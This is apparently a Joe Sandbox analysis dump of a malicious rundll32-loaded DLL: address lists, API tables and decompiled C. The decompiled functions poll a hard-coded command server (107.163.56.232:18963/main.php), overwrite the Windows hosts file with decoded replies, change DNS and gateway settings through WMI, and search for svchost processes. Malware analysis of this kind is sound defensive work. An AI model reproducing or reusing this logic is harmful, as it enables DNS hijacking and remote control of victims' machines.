            0x10007613
            0x10007614
            0x1000761a
            0x1000761c
            0x10007622
            0x10007629
            0x10007254
            0x10007254
            0x10007255
            0x1000725b
            0x1000725f
            0x10007264
            0x10007267
            0x1000726c
            0x1000726e
            0x10007276
            0x10007277
            0x10007280
            0x10007282
            0x10007286
            0x1000728d
            0x1000728d
            0x10007295
            0x1000729f
            0x100072a2
            0x100072a2
            0x1000726c
            0x100072aa
            0x100072af
            0x100072b1
            0x100075ec
            0x100075ec
            0x100075ef
            0x100075f2
            0x100075f4
            0x100075f9
            0x100075f9
            0x00000000
            0x100075f2
            0x100072b7
            0x100072b8
            0x100072c0
            0x100072c8
            0x100072cb
            0x100072cc
            0x100072d0
            0x100072d8
            0x100072de
            0x100072e1
            0x100072e4
            0x100072ea
            0x100072ed
            0x100072f2
            0x100072f4
            0x100072f5
            0x100072fe
            0x10007301
            0x10007302
            0x10007307
            0x1000730c
            0x1000730e
            0x10007319
            0x1000731f
            0x10007320
            0x10007323
            0x10007326
            0x10007329
            0x1000732e
            0x10007331
            0x10007335
            0x10007337
            0x1000733d
            0x1000733d
            0x10007339
            0x10007339
            0x10007339
            0x1000733f
            0x10007349
            0x1000734b
            0x10007354
            0x10007357
            0x1000735e
            0x10007365
            0x10007368
            0x1000736c
            0x10007376
            0x10007379
            0x1000737e
            0x10007381
            0x10007388
            0x1000738d
            0x10007395
            0x1000739b
            0x100073a3
            0x100073a5
            0x100073a9
            0x100073ab
            0x100073b1
            0x100073b1
            0x100073ad
            0x100073ad
            0x100073ad
            0x100073b3
            0x100073c0
            0x100073c6
            0x100073ca
            0x100073cf
            0x100073dc
            0x100073de
            0x100073e2
            0x100073e4
            0x100073ea
            0x100073ea
            0x100073e6
            0x100073e6
            0x100073e6
            0x100073ec
            0x100073f9
            0x100073ff
            0x10007403
            0x10007408
            0x10007415
            0x10007417
            0x1000741d
            0x10007426
            0x1000741f
            0x10007421
            0x10007421
            0x10007429
            0x1000742e
            0x10007434
            0x10007434
            0x10007430
            0x10007430
            0x10007430
            0x10007436
            0x1000743a
            0x1000744a
            0x1000744d
            0x10007452
            0x10007454
            0x10007454
            0x1000745d
            0x10007462
            0x10007467
            0x10007469
            0x1000746c
            0x10007472
            0x10007474
            0x10007474
            0x10007472
            0x1000730e
            0x100072f5
            0x1000747c
            0x1000748b
            0x1000748e
            0x100075dc
            0x100075dc
            0x100075df
            0x100075e2
            0x100075e4
            0x100075e9
            0x100075e9
            0x00000000
            0x100075e2
            0x10007494
            0x10007497
            0x1000749c
            0x1000749f
            0x00000000
            0x00000000
            0x100074a5
            0x100074ab
            0x100074ac
            0x100074b1
            0x100074b6
            0x100074b8
            0x100074c3
            0x100074c9
            0x100074ca
            0x100074cb
            0x100074cc
            0x100074cf
            0x100074d6
            0x100074db
            0x100074e1
            0x100074e5
            0x100074ea
            0x100074ed
            0x100074f3
            0x100074f9
            0x100074f9
            0x100074f5
            0x100074f5
            0x100074f5
            0x100074fb
            0x100074fe
            0x10007501
            0x10007503
            0x10007509
            0x10007509
            0x10007505
            0x10007505
            0x10007505
            0x1000750b
            0x10007518
            0x1000751d
            0x10007524
            0x1000752a
            0x10007532
            0x10007538
            0x10007540
            0x10007542
            0x10007548
            0x1000754e
            0x1000754e
            0x1000754a
            0x1000754a
            0x1000754a
            0x10007550
            0x10007553
            0x10007558
            0x1000755d
            0x10007560
            0x10007563
            0x10007567
            0x10007569
            0x1000756b
            0x1000756b
            0x10007570
            0x1000757d
            0x1000757f
            0x10007585
            0x1000758b
            0x1000758b
            0x10007587
            0x10007587
            0x10007587
            0x1000758d
            0x10007592
            0x10007598
            0x10007598
            0x10007594
            0x10007594
            0x10007594
            0x1000759a
            0x100075ac
            0x100075af
            0x100075b4
            0x100075b6
            0x100075bb
            0x100075bb
            0x100075be
            0x100075c3
            0x100075c5
            0x100075ca
            0x100075ca
            0x100075cd
            0x100075d2
            0x100075d4
            0x100075d9
            0x100075d9
            0x100075d2
            0x00000000
            0x100074b8
            0x1000747e
            0x10007481
            0x10007488
            0x10007489
            0x00000000
            0x00000000
            0x00000000
            0x10007489

            APIs
            • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007349
            • VariantInit.OLEAUT32(?), ref: 1000735E
            • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007379
            • VariantInit.OLEAUT32(?), ref: 10007388
              • Part of subcall function 10007A73: VariantInit.OLEAUT32(?), ref: 10007AB2
            • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007516
            • VariantInit.OLEAUT32(?), ref: 10007524
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitVariant$ArrayCreateSafe
            • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
            • API String ID: 2640012081-1668994663
            • Opcode ID: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
            • Instruction ID: e82695035937c1bda44e76a486134160da36d7b78c3243b38af4a6a2dd8dd1e6
            • Opcode Fuzzy Hash: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
            • Instruction Fuzzy Hash: 7AD14C70D00219EFEB15CFA4C8809EEBBB8FF49781F104019F519AB259DB75AA45CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 44%
            			E10006EEF() {
            				signed int _v8;
            				void _v267;
            				signed char _v268;
            				void _v527;
            				signed char _v528;
            				void _v783;
            				signed char _v784;
            				void _v1807;
            				signed char _v1808;
            				void _v5903;
            				signed char _v5904;
            				void* _t53;
            				void* _t65;
            				signed int _t76;
            				signed int _t90;
            				void* _t94;
            				void* _t95;
            				void* _t96;
            				signed int _t100;
            				void* _t102;
            				void* _t109;
            				signed int _t110;
            				void* _t117;
            				void* _t118;
            				signed int _t130;
            				intOrPtr* _t132;
            				void* _t134;
            				char** _t135;
            				char** _t138;
            				char** _t140;
            				void* _t143;
            				void* _t146;
            
            				E1000CD20(0x170c, _t96);
            				_push(_t94);
            				_t132 = E10001000(_t96, _t143, _t146, "QVNEU3ZjLmV4ZQ==");
            				 *_t135 = "QVlSVFNydi5heWU=";
            				_t118 = E10001000(_t96, _t143, _t146, _t117);
            				L1:
            				if(E1000591C(_t132) != 0 || E1000591C(_t118) != 0) {
            					Sleep(0xea60);
            					goto L1;
            				}
            				_v268 = _v268 & 0x00000000;
            				_t100 = 0x40;
            				_v528 = _v528 & 0x00000000;
            				memset( &_v267, 0, _t100 << 2);
            				asm("stosw");
            				asm("stosb");
            				__eflags = 0;
            				_t102 = 0x40;
            				_t53 = memset( &_v527, 0, 0 << 2);
            				asm("stosw");
            				E100268BC(_t53,  &_v527 + _t102);
            				asm("stosb");
            				 *_t132( &_v268, 0x104, _t53);
            				 *_t132( &_v528, 0x104);
            				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
            				E1000CD08(0,  &_v268);
            				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
            				_t65 = E1000CCAE(E1000CD08(0,  &_v528), _t94, 0, _t116, 0x104, 0x80000, _t134, __eflags, _t146, 0x80000);
            				_t138 =  &(_t135[0xd]);
            				_t95 = _t65;
            				while(1) {
            					_v1808 = _v1808 & 0x00000000;
            					memset( &_v1807, 0, 0xff << 2);
            					_v784 = _v784 & 0x00000000;
            					asm("stosw");
            					asm("stosb");
            					memset( &_v783, 0, 0 << 2);
            					_t140 =  &(_t138[6]);
            					asm("stosw");
            					asm("stosb");
            					__eflags = E10005C4C( &_v784, 0x100);
            					_t109 = 0x3f;
            					if(__eflags == 0) {
            						_push("http://107.163.56.232:18963/main.php");
            					} else {
            						_push( &_v784);
            					}
            					_push("%s");
            					_push( &_v1808);
            					E10003EF4();
            					_push(0x80000);
            					_push(0);
            					E1000CCFC(_t95, _t109, 0x80000, _t134, __eflags, _t95);
            					_t76 = E100061BD(_t109, 0x80000, __eflags, _t146,  &_v1808, _t95, 0x80000);
            					_t138 =  &(_t140[9]);
            					__eflags = _t76 - 7;
            					_v8 = _t76;
            					if(__eflags > 0) {
            						goto L11;
            					}
            					_push("iOffset");
            					_push("c:\\1.txt");
            					L10004139(_t109, _t116, __eflags, _t146);
            					L10:
            					Sleep( *0x10012500);
            					continue;
            					L11:
            					_t110 = 0;
            					__eflags = _t76;
            					if(_t76 <= 0) {
            						L16:
            						_push(_t95);
            						__eflags = E1000CD02(_t110, 0x80000) - 0x10;
            						if(__eflags <= 0) {
            							wsprintfA(0x10016ae0, "%s", _t95);
            							_v5904 = _v5904 & 0x00000000;
            							memset( &_v5903, 0, 0x3ff << 2);
            							asm("stosw");
            							asm("stosb");
            							E10005318(0, __eflags,  &_v5904);
            							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v268);
            							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v528);
            							_push(_t95);
            							_push(0x10016ae0);
            							E1000CDF2(0x80000);
            							_t138 =  &(_t138[0xd]);
            						}
            						goto L10;
            					} else {
            						goto L12;
            					}
            					do {
            						L12:
            						_t90 = _t110;
            						asm("cdq");
            						_t130 = 2;
            						_t116 = _t90 % _t130;
            						__eflags = _t90 % _t130;
            						if(_t90 % _t130 == 0) {
            							_t32 = _t110 + _t95;
            							 *_t32 =  *(_t110 + _t95) + 0x4b;
            							__eflags =  *_t32;
            						} else {
            							 *(_t110 + _t95) =  *(_t110 + _t95) + 0x3a;
            						}
            						_t110 = _t110 + 1;
            						__eflags = _t110 - _v8;
            					} while (_t110 < _v8);
            					goto L16;
            				}
            			}



































            0x10006ef7
            0x10006efc
            0x10006f09
            0x10006f0b
            0x10006f18
            0x10006f1a
            0x10006f23
            0x10006f35
            0x00000000
            0x10006f35
            0x10006f3d
            0x10006f46
            0x10006f4f
            0x10006f56
            0x10006f58
            0x10006f5a
            0x10006f5d
            0x10006f5f
            0x10006f66
            0x10006f68
            0x10006f6b
            0x10006f70
            0x10006f7e
            0x10006f88
            0x10006f94
            0x10006f9c
            0x10006fab
            0x10006fbe
            0x10006fc3
            0x10006fc6
            0x10006fc8
            0x10006fc8
            0x10006fdc
            0x10006fde
            0x10006fe7
            0x10006fe9
            0x10006ff8
            0x10006ff8
            0x10006ffa
            0x10006ffc
            0x1000700a
            0x1000700c
            0x1000700d
            0x10007018
            0x1000700f
            0x10007015
            0x10007015
            0x10007023
            0x10007028
            0x10007029
            0x10007031
            0x10007032
            0x10007035
            0x10007043
            0x10007048
            0x1000704b
            0x1000704e
            0x10007051
            0x00000000
            0x00000000
            0x10007053
            0x10007058
            0x1000705d
            0x10007064
            0x1000706a
            0x00000000
            0x10007075
            0x10007075
            0x10007077
            0x10007079
            0x10007097
            0x10007097
            0x1000709d
            0x100070a1
            0x100070ae
            0x100070b4
            0x100070c8
            0x100070ca
            0x100070cc
            0x100070d4
            0x100070e7
            0x100070fa
            0x100070ff
            0x10007100
            0x10007105
            0x1000710a
            0x1000710a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x1000707b
            0x1000707b
            0x1000707b
            0x1000707f
            0x10007080
            0x10007081
            0x10007083
            0x10007085
            0x1000708d
            0x1000708d
            0x1000708d
            0x10007087
            0x10007087
            0x10007087
            0x10007091
            0x10007092
            0x10007092
            0x00000000
            0x1000707b

            APIs
            • Sleep.KERNEL32(0000EA60), ref: 10006F35
            • LdrInitializeThunk.NTDLL ref: 10006F9C
            • LdrInitializeThunk.NTDLL ref: 10006FB3
            • Sleep.KERNEL32 ref: 1000706A
            • wsprintfA.USER32 ref: 100070AE
            • PrintFile.ABC(00000000,?,00000000), ref: 100070E7
            • PrintFile.ABC(00000000,?,00000000,?,00000000), ref: 100070FA
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: FileInitializePrintSleepThunk$wsprintf
            • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
            • API String ID: 983772623-1685166179
            • Opcode ID: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
            • Instruction ID: 3d380b1aca1ede5b104bd14f8e69b562dc8f53a9395fdf47d07c0f5b95106c5e
            • Opcode Fuzzy Hash: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
            • Instruction Fuzzy Hash: 2651C8B6D04359AAFB21D774CC45FCF77ACEF08381F2045A6F208E6086DA75AB848E55
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E10004D36(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
            				void* _t98;
            				intOrPtr* _t102;
            				intOrPtr _t103;
            				void* _t104;
            				intOrPtr* _t111;
            				intOrPtr* _t113;
            				intOrPtr* _t114;
            				intOrPtr* _t121;
            				intOrPtr* _t123;
            				intOrPtr* _t125;
            				intOrPtr* _t127;
            				intOrPtr* _t139;
            				intOrPtr* _t141;
            				intOrPtr* _t143;
            				intOrPtr* _t145;
            				void* _t146;
            				void* _t148;
            				intOrPtr* _t150;
            				void* _t151;
            				void* _t153;
            				intOrPtr* _t163;
            				signed int _t165;
            				intOrPtr _t173;
            				void* _t206;
            				void* _t214;
            				void* _t215;
            				intOrPtr _t216;
            				intOrPtr* _t217;
            				intOrPtr* _t219;
            				void* _t220;
            				void* _t222;
            				void* _t223;
            				void* _t225;
            
            				_t245 = __fp0;
            				_t227 = __eflags;
            				_t202 = __edi;
            				_t161 = __ecx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				E1000CD20(0x182c, __ecx);
            				 *((intOrPtr*)(_t220 - 0x20)) = 0;
            				_t98 = E1000CCFC(0, _t161, __esi, _t220, _t227, _t220 - 0x48);
            				_t223 = _t222 + 0xc;
            				0x1003a410(0, 0, 0, 0, 0x10, __edi, __esi, __ebx);
            				E1002D3DC(_t98, 0, _t161, __edx, __edi, __esi, _t227, _t220, 0, 0xffffffff, 0, 0, 0);
            				 *((intOrPtr*)(_t220 - 0x1c)) = 0;
            				0x100411b4(E100101A8, 0, 1, E100100D8, _t220 - 0x1c, 3, 0, 0, 0);
            				_push(cs);
            				_push( *((intOrPtr*)(_t220 + 8)));
            				 *((intOrPtr*)(_t220 - 0x18)) = 0;
            				_t102 =  *((intOrPtr*)(E100050A1(0, _t220 + 8, __edx, _t202, __esi, _t227, __fp0)));
            				 *(_t220 - 4) = 0;
            				if(_t102 == 0) {
            					_t103 = 0;
            					__eflags = 0;
            				} else {
            					_t103 =  *_t102;
            				}
            				_t163 =  *((intOrPtr*)(_t220 - 0x1c));
            				_t214 = _t220 - 0x18;
            				_t198 =  *_t163;
            				_t104 =  *((intOrPtr*)( *_t163 + 0xc))(_t163, _t103, 0, 0, 0, 0, 0, 0, _t214);
            				_t164 =  *((intOrPtr*)(_t220 + 8));
            				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            				_t229 =  *((intOrPtr*)(_t220 + 8));
            				if( *((intOrPtr*)(_t220 + 8)) != 0) {
            					E1000515C(_t104, _t164);
            				}
            				0x1003ed69(_t214,  *((intOrPtr*)(_t220 - 0x18)), 0xa, 0, 0, 3, 3, 0, 0);
            				_t215 = L"SELECT * FROM ";
            				_t165 = 7;
            				memcpy(_t220 - 0x838, _t215, _t165 << 2);
            				asm("movsw");
            				_t206 = _t220 - 0x81a;
            				memset(_t206, 0, 0x1ec << 2);
            				_t225 = _t223 + 0x18;
            				_t207 = _t206 + 0x1ec;
            				asm("stosw");
            				 *((intOrPtr*)(_t220 - 0x10)) = 0;
            				0x1003bb02(_t215, _t220 - 0x838,  *((intOrPtr*)(_t220 + 0xc)));
            				_push(_t220 - 0x838);
            				_t111 =  *((intOrPtr*)(E100050A1(0, _t220 - 0x28, _t198, _t206 + 0x1ec, _t215, _t229, _t245)));
            				 *(_t220 - 4) = 1;
            				_t230 = _t111;
            				if(_t111 == 0) {
            					_t216 = 0;
            					__eflags = 0;
            				} else {
            					_t216 =  *_t111;
            				}
            				_push("WQL");
            				_t113 =  *((intOrPtr*)(E1000504D(0, _t220 + 8, _t198, _t207, _t216, _t230, _t245)));
            				 *(_t220 - 4) = 2;
            				if(_t113 == 0) {
            					_t173 = 0;
            					__eflags = 0;
            				} else {
            					_t173 =  *_t113;
            				}
            				_t114 =  *((intOrPtr*)(_t220 - 0x18));
            				_t199 =  *_t114;
            				_t115 =  *((intOrPtr*)( *_t114 + 0x50))(_t114, _t173, _t216, 0x30, 0, _t220 - 0x10);
            				_t174 =  *((intOrPtr*)(_t220 + 8));
            				if( *((intOrPtr*)(_t220 + 8)) != 0) {
            					_t115 = E1000515C(_t115, _t174);
            					 *((intOrPtr*)(_t220 + 8)) = 0;
            				}
            				_t175 =  *((intOrPtr*)(_t220 - 0x28));
            				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            				if( *((intOrPtr*)(_t220 - 0x28)) != 0) {
            					_t115 = E1000515C(_t115, _t175);
            				}
            				 *((intOrPtr*)(_t220 - 0x24)) = 0;
            				if( *((intOrPtr*)(_t220 - 0x10)) == 0) {
            					L32:
            					_pop(_t217);
            					E10025EA7(_t115, 0, _t175, _t199, _t217, _t220, _t243);
            					 *_t217(_t220 - 0x48);
            					 *_t217(_t220 - 0x38);
            					_t121 =  *((intOrPtr*)(_t220 - 0x18));
            					 *((intOrPtr*)( *_t121 + 8))(_t121);
            					_t123 =  *((intOrPtr*)(_t220 - 0x1c));
            					 *((intOrPtr*)( *_t123 + 8))(_t123);
            					_t125 =  *((intOrPtr*)(_t220 - 0x10));
            					 *((intOrPtr*)( *_t125 + 8))(_t125);
            					_t127 =  *((intOrPtr*)(_t220 - 0x14));
            					E10026ED3( *((intOrPtr*)( *_t127 + 8))(_t127), 0,  *_t127, _t199, _t217, _t243);
            					 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
            					return  *((intOrPtr*)(_t220 - 0x20));
            				} else {
            					_t219 =  *0x1000e230;
            					while(1) {
            						_push(_t220 - 0x24);
            						_t175 = _t220 - 0x14;
            						_push(_t220 - 0x14);
            						_push(1);
            						_push(0xffffffff);
            						_push( *((intOrPtr*)(_t220 - 0x10)));
            						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)))) + 0x10))() != 0) {
            							goto L32;
            						}
            						 *_t219(_t220 - 0x48);
            						 *_t219(_t220 - 0x38);
            						 *_t219(_t220 - 0x68);
            						_t139 =  *((intOrPtr*)(_t220 - 0x14));
            						 *((intOrPtr*)(_t220 - 0x30)) = 0;
            						 *((intOrPtr*)( *_t139 + 0x10))(_t139, L"Name", 0, _t220 - 0x48, 0, 0);
            						_t141 =  *((intOrPtr*)(_t220 - 0x14));
            						 *((intOrPtr*)( *_t141 + 0x10))(_t141, L"CommandLine", 0, _t220 - 0x38, 0, 0);
            						_t143 =  *((intOrPtr*)(_t220 - 0x14));
            						_t199 = _t220 - 0x68;
            						_t175 =  *_t143;
            						_t115 =  *((intOrPtr*)( *_t143 + 0x10))(_t143, L"ProcessID", 0, _t220 - 0x68, 0, 0);
            						_t236 =  *((intOrPtr*)(_t220 - 0x30));
            						if( *((intOrPtr*)(_t220 - 0x30)) != 0) {
            							 *(_t220 - 0x58) = 0;
            							_push( *((intOrPtr*)(_t220 - 0x40)));
            							asm("stosd");
            							asm("stosd");
            							asm("stosd");
            							asm("stosw");
            							asm("stosb");
            							_t145 = E100050A1(0, _t220 + 8, _t199, _t220 - 0x57, _t219, _t236, _t245);
            							_t186 =  *_t145;
            							 *(_t220 - 4) = 3;
            							if( *_t145 == 0) {
            								_t146 = 0;
            								__eflags = 0;
            							} else {
            								_t146 = E10005189(_t186, _t199, _t245);
            							}
            							_push(_t146);
            							_t148 = E1000CD0E(_t186, _t220 - 0x58);
            							 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            							_t189 =  *((intOrPtr*)(_t220 + 8));
            							if( *((intOrPtr*)(_t220 + 8)) != 0) {
            								E1000515C(_t148, _t189);
            								 *((intOrPtr*)(_t220 + 8)) = 0;
            							}
            							_t115 = _t220 - 0x58;
            							0x10033fcb(_t115, "svchost.exe");
            							_t239 = _t115;
            							_t175 = _t219;
            							if(_t115 == 0) {
            								 *((char*)(_t220 - 0x1838)) = 0;
            								_push( *((intOrPtr*)(_t220 - 0x30)));
            								memset(_t220 - 0x1837, _t115, 0x3ff << 2);
            								_t225 = _t225 + 0xc;
            								asm("stosw");
            								asm("stosb");
            								_t150 = E100050A1(0, _t220 + 0xc, _t199, _t220 - 0x1837 + 0x3ff, _t219, _t239, _t245);
            								_t194 =  *_t150;
            								 *(_t220 - 4) = 4;
            								if( *_t150 == 0) {
            									_t151 = 0;
            									__eflags = 0;
            								} else {
            									_t151 = E10005189(_t194, _t199, _t245);
            								}
            								_push(_t151);
            								_t153 = E1000CD0E(_t194, _t220 - 0x1838);
            								 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            								_t175 =  *((intOrPtr*)(_t220 + 0xc));
            								if( *((intOrPtr*)(_t220 + 0xc)) != 0) {
            									E1000515C(_t153, _t175);
            									 *((intOrPtr*)(_t220 + 0xc)) = 0;
            								}
            								0x10035299(_t220 - 0x1838, "svchost.exe -k NetworkService");
            								asm("fild dword [ebp-0x74f98b40]");
            								_t220 = _t220 + 1;
            								_t115 =  *0x39e04589;
            							}
            						}
            						_t243 =  *((intOrPtr*)(_t220 - 0x10));
            						if( *((intOrPtr*)(_t220 - 0x10)) != 0) {
            							continue;
            						} else {
            							goto L32;
            						}
            					}
            					goto L32;
            				}
            			}




































            0x10004d36
            0x10004d36
            0x10004d36
            0x10004d36
            0x10004d3b
            0x10004d45
            0x10004d56
            0x10004d59
            0x10004d5e
            0x10004d64
            0x10004d75
            0x10004d7d
            0x10004d8e
            0x10004d93
            0x10004d94
            0x10004d9a
            0x10004da2
            0x10004da4
            0x10004da9
            0x10004daf
            0x10004daf
            0x10004dab
            0x10004dab
            0x10004dab
            0x10004db1
            0x10004db4
            0x10004db9
            0x10004dc2
            0x10004dc5
            0x10004dc8
            0x10004dcc
            0x10004dce
            0x10004dd0
            0x10004dd0
            0x10004de3
            0x10004dea
            0x10004def
            0x10004df6
            0x10004df8
            0x10004e01
            0x10004e0a
            0x10004e0a
            0x10004e0a
            0x10004e0c
            0x10004e14
            0x10004e19
            0x10004e26
            0x10004e2f
            0x10004e31
            0x10004e38
            0x10004e3a
            0x10004e40
            0x10004e40
            0x10004e3c
            0x10004e3c
            0x10004e3c
            0x10004e42
            0x10004e4f
            0x10004e51
            0x10004e57
            0x10004e5d
            0x10004e5d
            0x10004e59
            0x10004e59
            0x10004e59
            0x10004e5f
            0x10004e67
            0x10004e6e
            0x10004e71
            0x10004e76
            0x10004e78
            0x10004e7d
            0x10004e7d
            0x10004e80
            0x10004e83
            0x10004e89
            0x10004e8b
            0x10004e8b
            0x10004e93
            0x10004e96
            0x10004fff
            0x10004fff
            0x10005000
            0x10005009
            0x1000500f
            0x10005011
            0x10005017
            0x1000501a
            0x10005020
            0x10005023
            0x10005029
            0x1000502c
            0x10005035
            0x10005044
            0x1000504c
            0x10004e9c
            0x10004e9c
            0x10004ea2
            0x10004ea8
            0x10004ea9
            0x10004eae
            0x10004eaf
            0x10004eb1
            0x10004eb3
            0x10004ebb
            0x00000000
            0x00000000
            0x10004ec5
            0x10004ecb
            0x10004ed1
            0x10004ed3
            0x10004edc
            0x10004ee8
            0x10004eeb
            0x10004efd
            0x10004f00
            0x10004f04
            0x10004f08
            0x10004f12
            0x10004f15
            0x10004f18
            0x10004f23
            0x10004f26
            0x10004f29
            0x10004f2a
            0x10004f2b
            0x10004f2c
            0x10004f31
            0x10004f32
            0x10004f37
            0x10004f39
            0x10004f42
            0x10004f4b
            0x10004f4b
            0x10004f44
            0x10004f44
            0x10004f44
            0x10004f4d
            0x10004f52
            0x10004f57
            0x10004f5d
            0x10004f62
            0x10004f64
            0x10004f69
            0x10004f69
            0x10004f6c
            0x10004f76
            0x10004f7c
            0x10004f7e
            0x10004f7f
            0x10004f8c
            0x10004f92
            0x10004f95
            0x10004f95
            0x10004f97
            0x10004f9c
            0x10004f9d
            0x10004fa2
            0x10004fa4
            0x10004fad
            0x10004fb6
            0x10004fb6
            0x10004faf
            0x10004faf
            0x10004faf
            0x10004fb8
            0x10004fc0
            0x10004fc5
            0x10004fcb
            0x10004fd0
            0x10004fd2
            0x10004fd7
            0x10004fd7
            0x10004fe6
            0x10004feb
            0x10004ff1
            0x10004ff2
            0x10004ff2
            0x10004f7f
            0x10004ff6
            0x10004ff9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x10004ff9
            0x00000000
            0x10004ea2

            APIs
            • VariantInit.OLEAUT32(00000000), ref: 10004EC5
            • VariantInit.OLEAUT32(?), ref: 10004ECB
            • VariantInit.OLEAUT32(000000FF), ref: 10004ED1
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitVariant
            • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
            • API String ID: 1927566239-2685825574
            • Opcode ID: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
            • Instruction ID: 685215bc3e39be9e7018d3cf9a0ce008db6110164ca837be315af6ad884bf42e
            • Opcode Fuzzy Hash: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
            • Instruction Fuzzy Hash: 7AA15BB5900209AFEB04DF94CC81DEEBBBCEF48394F104569F615AB295CB31AE45CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 41%
            			E1000827D() {
            				signed int _v8;
            				void _v267;
            				signed char _v268;
            				void _v527;
            				signed char _v528;
            				char _v783;
            				signed char _v784;
            				void _v1807;
            				signed char _v1808;
            				void* _t50;
            				void* _t56;
            				signed int _t61;
            				signed int _t67;
            				void* _t70;
            				void* _t71;
            				signed int _t72;
            				void* _t78;
            				void* _t81;
            				signed int _t82;
            				void* _t83;
            				void* _t94;
            				signed int _t95;
            				intOrPtr* _t96;
            				void* _t98;
            				void* _t99;
            				void* _t102;
            				void* _t104;
            				void* _t109;
            
            				_v268 = _v268 & 0x00000000;
            				_t72 = 0x40;
            				memset( &_v267, 0, _t72 << 2);
            				_v528 = _v528 & 0x00000000;
            				asm("stosw");
            				asm("stosb");
            				memset( &_v527, E1002ED85(_t96, _t98), 0 << 2);
            				asm("stosw");
            				asm("stosb");
            				 *_t96( &_v268, 0x104, _t98, 0x40);
            				 *_t96( &_v528, 0x104);
            				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
            				E1000CD08(0,  &_v268);
            				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
            				_t50 = E1000CCAE(E1000CD08(0,  &_v528), _t70, 0, _t86, 0x104, 0x80000, _t98, 0, _t109, 0x80000);
            				_t102 = _t99 + 0x34;
